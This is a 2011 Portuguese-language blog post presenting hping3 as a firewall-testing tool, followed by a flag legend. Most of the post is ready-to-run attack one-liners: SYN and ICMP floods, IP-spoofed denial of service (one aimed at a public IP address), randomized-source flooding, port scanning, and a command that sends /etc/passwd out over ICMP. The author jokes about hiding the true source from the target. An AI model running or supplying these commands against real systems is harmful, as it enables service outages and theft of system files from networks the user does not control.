BEM VINDO AO BLOG DO MARCOS CARRARO CRIADOR DO "CARRARO DASHBOARD". MUITO MAIS QUE UM SIMPLES BLOG.

sexta-feira, 17 de junho de 2011

yum install hping - Ho ferramenta do capeta #linux

Buenas Glaera,

Tudo certo com vocês? Nunca ninguém responde =="!!
Ferramenta: hping3;
Para que server?
Quem sabe você construiu um firewall show de bola na sua rede, mas não sabe como fazer alguns testes como spoof, syn flooad, DoS, entre outras funções que a mesma tem, não é bem limitada não.
Podemos usar esta ferramenta para testar nosso firewall, verificar se ele consegue barrar ataques DoS, spoof, entre outros, ou para o lado ruim não é o nosso caso galera.
Caso queira mais informações acesse wiki.hping.org

Floodar com 10mil syn um ip na porta 80
hping3 --flood --syn -c 10000 -a 1.2.3.4 -p 80 200.157.25.8

DoS - O ataque DoS, tem a idéia de fazer com que a placa de rede, ip, banda, não consiga respirar, fazendo disso uma parada dos serviços, ela simplesmente não consegue mais responder.
hping3 --flood 200.157.25.8

DoS com outra TTL - Podemos mudar os nossos "HOPS" para chegar em nosso destino como neste caso, e fazemos uma inundação de 100 pacotes com ttl 250 para o IP, podemos usar outras tantas combinações de uma linha.
hping --flood --ttl 250 --count 100 192.168.0.1

Spoof com um falso IP - Esta parte é legal até, podemos mandar milhares de pacotes com outro IP, não cheguei a testar em um FW publico.
hping --spoof 1.2.3.4 192.168.0.1
hping --spoof FALSOIP IPQUENTE

DoS com spoofing - Que tal, fazer um DoS e IP spoofing ao mesmo tempo? Colocamos um IP falso para que o "destino" não desconfie EHEHEHEH. Isso é ate legal de se fazer, com testes interno funciona perfeitamente, Externo é outra história não contada neste blog.
hping --flood --spoof 8.8.8.8 --ttl 66 192.168.0.2

Spoof Loucão - HAHHA que tal mandar várias inundações loucamente para um IP?hping3 --spoof 192.168.0.2 --icmp-ts 192.168.0.1
hping3 --spoof MEUIP --icmp-ts IPDESTINO

Flood com Assinatura - No caso ele vai enviar alguns pacotes com esta rotulação podendo ser um arquivo ou simplesmente na escrita como vemos nos exemplos.
hping3 --flood --syn -a 1.2.3.4 -e “TESTANDO” -S -s 80 192.168.0.1
Criando arquivo de assinatura
echo "** explosao **" > /vat/tmp/assinatura.sig
Enviando o ataque
hping -2 -p 7 192.168.0.3 -d 50 -E /var/tmp/assinatura.sig

Para monitorar
tcpdump -i ethX -nX proto 17

Transferir informações pelo ICMP - Que parte louca, sim quando esta lendo alguns manuais na internet achei engraçado esta parte
hping 192.168.0.3 --icmp –d 100 --sign signature --file /etc/passwd

monitorando
tcpdump -i ethX -nX 

PortScan 
hping3 -I eth0 -S 192.168.0.1 -p ++137
Alguns Exemplos encontrados na internet

hping2 23.23.23.2 -p 80 -S --faster --rand-source

Nesta linha disparamos: -p 80 -S --fast --rand-source (-S setamos a flag como syn, –fast Alias for -i u10000. O Hping irá enviar 10 pacotes por segundos; –rand-source habilita o modo radom e troca o ip de origem dinamicamente). Desta forma enviaremos a cada segundo 10 tentativas de conexão sem esperar a resposta do host-alvo com ips diferentes a cada pacote enviado. Até o momento em que este alvo não poderá responder todas as requisições e o kernel negará o serviço.

Legenda
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-e assinatura
-a meu IP
-p porta
-I interface de rede utilizada ex: hping -I eth1 ......-p ++22 Começa uma contagem a partir da porta de destino 22 vai em ordem crescente 22 23 24 25....
-s porta de origem por padrão ele começa aleatório
-M definir o número de seqüência TCP
-SA Uma maneira de ficar transparente
-i intervalo de tempo (Caso o alvo tenha um IDs ou iptables com modulo recent)
-i 10 (10 segundos)
-i u10 (10 micro segundos)

Para uma mais informações

Editado: 07/07/2011
No blog do Coruja de TI tem um manual de referencias muito útil.


Um comentário:

  1. HOHOOOO ferramenta foda, ideal pra testar meus novos firewalls, valeu :D

    ResponderExcluir

Posts que a turma mais esta lendo...

Posts que a turma mais esta lendo...

Marcos Carraro